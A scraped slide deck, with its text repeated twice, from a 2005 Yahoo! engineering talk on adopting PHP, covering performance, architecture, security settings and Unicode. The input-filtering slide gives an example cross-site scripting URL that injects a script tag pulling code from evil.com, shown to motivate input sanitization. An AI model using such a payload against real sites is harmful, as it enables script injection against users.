PHP at Yahoo! http://public.yahoo.com/~radwin/ Michael J. Radwin October 20, 2005 1
Outline • Yahoo!, as seen by an engineer • Choosing PHP in 2002 • PHP architecture at Yahoo! 2
The Internet’s most trafficked site 3
25 countries, 13 languages 4
Yahoo! by the Numbers • 411M unique visitors per month • 191M active registered users • 11.4M fee-paying customers • 3.4B average daily pageviews October 2005 5
6
Engineering Values 1. Security & Privacy – We must protect our customers’ information 2. High Availability – If the site is offline, we’re missing the opportunity to serve our customers 3. Performance – We serve billions of pageviews a day 4. Flexibility & Innovation – Customize site for each market – Rapid development of new features 7
From Proprietary to Open Source 94 95 96 97 98 99 00 01 02 03 04 05 Web Server Apache “Filo Server” DB Flat Files Web Lang yScript 8
Choosing a Language How and Why We Selected PHP 9
Choosing PHP: brief history • October 2001: 3 proprietary languages – Costly to continue to maintain each – Limited features (no subroutines!) • Committee began researching – Compare features, performance – Build vs. Buy vs. Open Source • PHP selected May 2002 10
Ideal Language Criteria 1. High performance 8. Interpreted or 2. Robust, sand-boxed dynamically compiled 3. Language features 9. i18n support • Loops, conditionals 10. Clean separation of presentation/content/ • Complex data-types app semantics 4. C/C++ extensions 11. Low training costs 5. Runs on FreeBSD 12. Doesn’t require CS degree to use 11
Top 10 Language Choices yScript mod_include XSLT 12
Performance: Requests Requests/sec 350 300 250 PHP 200 YSP mod_perl req/s 150 HF2k yScript 100 Network max 50 0 25 50 75 100 150 200 300 400 500 Concurrent requests 13
Performance: Memory Active Virtual Memory 1000000 800000 kbytes active 600000 PHP YSP mod_perl 400000 HF2k yScript 200000 0 25 50 75 100 150 200 300 400 500 Concurrent requests 14
Why we picked PHP 1. Designed for web scripting 2. High performance 3. Large, Open Source community • Documentation, easy to hire developers 4. “Code-in-HTML” paradigm <html> <?php echo "Hello World"; ?> </html> 5. Integration, libraries, extensibility 6. Tools: IDE, debugger, profiler 15
PHP at Yahoo! Today 16
Yahoo!’s Development Methodology • Server Architecture • File Layout • Dependency Management • Security • Performance • Globalization 17
Server Architecture Web Server web server web server Load Balancer Scripts User Profile Apache Web Server Services Ad Server 18
File Layout HTML Templates 95% HTML /usr/local/share/htdocs/*.php 5% PHP Template Helpers 50% HTML /usr/local/share/htdocs/*.inc 50% PHP Business Logic 0% HTML /usr/local/share/pear/*.inc 100% PHP C/C++ Core Code 0% HTML Data access, Networking, Crypto 0% PHP 19
Dependency Management • Base PHP package depends only on XML parser ./configure --disable-all • Self-Contained Extensions – mysql, dba, curl, ldap, pcre, gd, iconv – To enable 1. Install /usr/local/lib/php/20020429/ mysql.so 2. Add “extension = mysql.so” to php.ini – Avoids unnecessary dependencies – Smaller Apache memory footprint 20
Security: INI Settings • open_basedir – Insurance against /etc/passwd exploits • allow_url_fopen = Off – Use libcurl extension instead – Avoid open proxy exploits • display_errors = Off – However, log_errors = On • safe_mode = Off – Intended for shared hosting environment 21
Security: Input Filtering http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js> • Cross Site Scripting (XSS) most common attack – Also “SQL Injection” • Normal approach – strip_tags() – mysqli_escape_string() – Examine every line code – Tedious and error-prone • Use input_filter hook – Sanitize all user-submitted data – GET/POST/Cookie 22
Performance: Opcode Caches • Easiest performance boost – Cache parsed .php scripts in shared memory – Optimizations – No code modifications! • Several products available – Zend Performance Suite – APC – Turck MMCache 23
Performance: PHP Extensions in C++ • PHP ships with 80 extensions written in C/C++ • Yahoo! develops its own proprietary extensions – Fast execution speed – Access to client libraries • Longer development cycle – Edit, compile, link, debug – Manual memory- management 24
Globalization: PHP Unicode + + ICU = 6 • Native Unicode support in 2006 • Collaborative effort – Andrei Zmievski (Yahoo!) – Andi Gutmans (Zend) – Many members of PHP Community 25
26

PHP at Yahoo!

  • 1.
    PHP at Yahoo! http://public.yahoo.com/~radwin/ Michael J. Radwin October 20, 2005 1
  • 2.
    Outline • Yahoo!, as seen by an engineer • Choosing PHP in 2002 • PHP architecture at Yahoo! 2
  • 3.
    The Internet’s mosttrafficked site 3
  • 4.
    25 countries, 13languages 4
  • 5.
    Yahoo! by theNumbers • 411M unique visitors per month • 191M active registered users • 11.4M fee-paying customers • 3.4B average daily pageviews October 2005 5
  • 6.
  • 7.
    Engineering Values 1. Security & Privacy – We must protect our customers’ information 2. High Availability – If the site is offline, we’re missing the opportunity to serve our customers 3. Performance – We serve billions of pageviews a day 4. Flexibility & Innovation – Customize site for each market – Rapid development of new features 7
  • 8.
    From Proprietary toOpen Source 94 95 96 97 98 99 00 01 02 03 04 05 Web Server Apache “Filo Server” DB Flat Files Web Lang yScript 8
  • 9.
    Choosing a Language Howand Why We Selected PHP 9
  • 10.
    Choosing PHP: briefhistory • October 2001: 3 proprietary languages – Costly to continue to maintain each – Limited features (no subroutines!) • Committee began researching – Compare features, performance – Build vs. Buy vs. Open Source • PHP selected May 2002 10
  • 11.
    Ideal Language Criteria 1. High performance 8. Interpreted or 2. Robust, sand-boxed dynamically compiled 3. Language features 9. i18n support • Loops, conditionals 10. Clean separation of presentation/content/ • Complex data-types app semantics 4. C/C++ extensions 11. Low training costs 5. Runs on FreeBSD 12. Doesn’t require CS degree to use 11
  • 12.
    Top 10 LanguageChoices yScript mod_include XSLT 12
  • 13.
    Performance: Requests Requests/sec 350 300 250 PHP 200 YSP mod_perl req/s 150 HF2k yScript 100 Network max 50 0 25 50 75 100 150 200 300 400 500 Concurrent requests 13
  • 14.
    Performance: Memory Active Virtual Memory 1000000 800000 kbytes active 600000 PHP YSP mod_perl 400000 HF2k yScript 200000 0 25 50 75 100 150 200 300 400 500 Concurrent requests 14
  • 15.
    Why we pickedPHP 1. Designed for web scripting 2. High performance 3. Large, Open Source community • Documentation, easy to hire developers 4. “Code-in-HTML” paradigm <html> <?php echo "Hello World"; ?> </html> 5. Integration, libraries, extensibility 6. Tools: IDE, debugger, profiler 15
  • 16.
    PHP at Yahoo!Today 16
  • 17.
    Yahoo!’s Development Methodology • Server Architecture • File Layout • Dependency Management • Security • Performance • Globalization 17
  • 18.
    Server Architecture Web Server web server web server Load Balancer Scripts User Profile Apache Web Server Services Ad Server 18
  • 19.
    File Layout HTML Templates 95% HTML /usr/local/share/htdocs/*.php 5% PHP Template Helpers 50% HTML /usr/local/share/htdocs/*.inc 50% PHP Business Logic 0% HTML /usr/local/share/pear/*.inc 100% PHP C/C++ Core Code 0% HTML Data access, Networking, Crypto 0% PHP 19
  • 20.
    Dependency Management • Base PHP package depends only on XML parser ./configure --disable-all • Self-Contained Extensions – mysql, dba, curl, ldap, pcre, gd, iconv – To enable 1. Install /usr/local/lib/php/20020429/ mysql.so 2. Add “extension = mysql.so” to php.ini – Avoids unnecessary dependencies – Smaller Apache memory footprint 20
  • 21.
    Security: INI Settings • open_basedir – Insurance against /etc/passwd exploits • allow_url_fopen = Off – Use libcurl extension instead – Avoid open proxy exploits • display_errors = Off – However, log_errors = On • safe_mode = Off – Intended for shared hosting environment 21
  • 22.
    Security: Input Filtering http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js> • Cross Site Scripting (XSS) most common attack – Also “SQL Injection” • Normal approach – strip_tags() – mysqli_escape_string() – Examine every line code – Tedious and error-prone • Use input_filter hook – Sanitize all user-submitted data – GET/POST/Cookie 22
  • 23.
    Performance: Opcode Caches • Easiest performance boost – Cache parsed .php scripts in shared memory – Optimizations – No code modifications! • Several products available – Zend Performance Suite – APC – Turck MMCache 23
  • 24.
    Performance: PHP Extensionsin C++ • PHP ships with 80 extensions written in C/C++ • Yahoo! develops its own proprietary extensions – Fast execution speed – Access to client libraries • Longer development cycle – Edit, compile, link, debug – Manual memory- management 24
  • 25.
    Globalization: PHP Unicode + + ICU = 6 • Native Unicode support in 2006 • Collaborative effort – Andrei Zmievski (Yahoo!) – Andi Gutmans (Zend) – Many members of PHP Community 25
  • 26.